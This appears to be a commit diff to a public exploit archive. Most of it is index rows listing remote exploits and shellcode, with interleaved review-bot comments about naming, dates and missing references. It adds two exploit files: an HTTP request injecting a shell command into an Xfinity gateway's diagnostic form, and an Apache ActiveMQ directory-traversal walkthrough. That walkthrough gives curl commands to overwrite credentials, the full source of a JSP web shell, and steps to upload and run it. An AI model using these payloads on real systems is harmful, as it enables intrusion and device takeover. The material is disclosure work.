1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900
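Review bot: the unchanged context at 1791 and 1794 still carries the "RealVNC 4.1.0 < 4.1.1" form. If that "<" means the pair 4.1.0 and 4.1.1 (as "9 < 11" did for 40748 in this commit), those rows deserve the same "4.1.0/4.1.1" treatment; if it means an exclusive bound they are fine as is. That the two readings cannot be told apart from the title alone is exactly the ambiguity this cleanup is removing, so it is worth settling here too.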
@ -9637,7 +9637,7 @@ id,file,description,date,author,platform,type,port
5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,windows,remote,0 5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,windows,remote,0
5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,windows,remote,0 5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,windows,remote,0
5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
5751,platforms/windows/remote/5751.pl,"FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22 5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0
5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161
@ -9835,7 +9835,7 @@ id,file,description,date,author,platform,type,port
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22 8295,platforms/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0 8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0
8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0
@ -10559,7 +10559,7 @@ id,file,description,date,author,platform,type,port
16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16461,platforms/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
@ -12605,7 +12605,7 @@ id,file,description,date,author,platform,type,port
23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0
23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0 23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"FreeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0
23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0
23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0
@ -12901,7 +12901,7 @@ id,file,description,date,author,platform,type,port
24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0
24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0
24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
24133,platforms/windows/remote/24133.rb,"FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0 24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0
24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0
24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
@ -15096,7 +15096,7 @@ id,file,description,date,author,platform,type,port
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0 40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0 40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0 40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0 40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0 40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
@ -15116,6 +15116,7 @@ id,file,description,date,author,platform,type,port
40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0 40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0 40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40854,platforms/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow",2016-12-01,vportal,windows,remote,0 40854,platforms/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow",2016-12-01,vportal,windows,remote,0
40857,platforms/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -18802,7 +18803,7 @@ id,file,description,date,author,platform,type,port
5710,platforms/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection",2008-05-31,Stack,php,webapps,0 5710,platforms/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection",2008-05-31,Stack,php,webapps,0
5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0 5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
5714,platforms/php/webapps/5714.pl,"Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0 5714,platforms/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0
5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0
@ -36837,3 +36838,4 @@ id,file,description,date,author,platform,type,port
40851,platforms/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0 40851,platforms/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0 40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0 40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0
40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0
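Review bot: the 40857 row added in the `@ -15116` hunk carries date 2015-08-17, more than a year before this DB update and well before the 2016-12-02 date of the other new row (40856); the ActiveMQ write-up it indexes has no date line of its own, so confirm that 2015-08-17 is the original disclosure date rather than a typo before this goes in.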


@ -0,0 +1,33 @@
# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://xfinity.com
# Platform: php
The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
PoC:
POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/
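Review bot: the header block gives `# Platform: php` but no gateway model or firmware version, and the `# Vendor Homepage` line points at the ISP's front page rather than a product or firmware page, so a reader cannot tell which builds are affected or whether a later firmware addresses it; add the model and firmware version the request was tested against. The last line should also cite the related entry (40853) by its title and not only as a bare URL, so the cross-reference survives if the link changes.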


@ -0,0 +1,71 @@
I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality.
I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter.
An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution.
Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes:
<bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping">
<property name="constraint" ref="securityConstraint">
<property name="pathSpec" value="/api/*,/admin/*,*.jsp">
</property></property>
</bean>
Effectively blocking the upload of JSP files into contexts that will allow them to execute.
I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials:
$ cat jetty-realm.properties hacker: hacker, admin
$ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties
This seems to have the disadvantage of requiring a reboot of the server to take effect.
I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot.
The attacker can then take a standard JSP shell:
$ cat cmd.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context:
$ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp
And pop a calc on the server:
$ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe
Exploiting non-Windows servers
All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked.
That said, clients can specify the uploadUrl for a blob transfer, e.g.:
tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com
An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers.
Resolution
The ActiveMQ project has released an advisory and patches.
This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind.
It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.
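Review bot: the Resolution section states that the ActiveMQ project has released an advisory and patches but gives no link, CVE identifier or first fixed release, so readers cannot check whether their deployment is affected; add the advisory reference and the fixed version. The `conf/jetty.xml` excerpt near the top is also not well-formed: `<property name="constraint" ref="securityConstraint">` is left open and both properties are then closed together by `</property></property>`, which nests two sibling elements into each other; fix the nesting so the excerpt matches the shipped file.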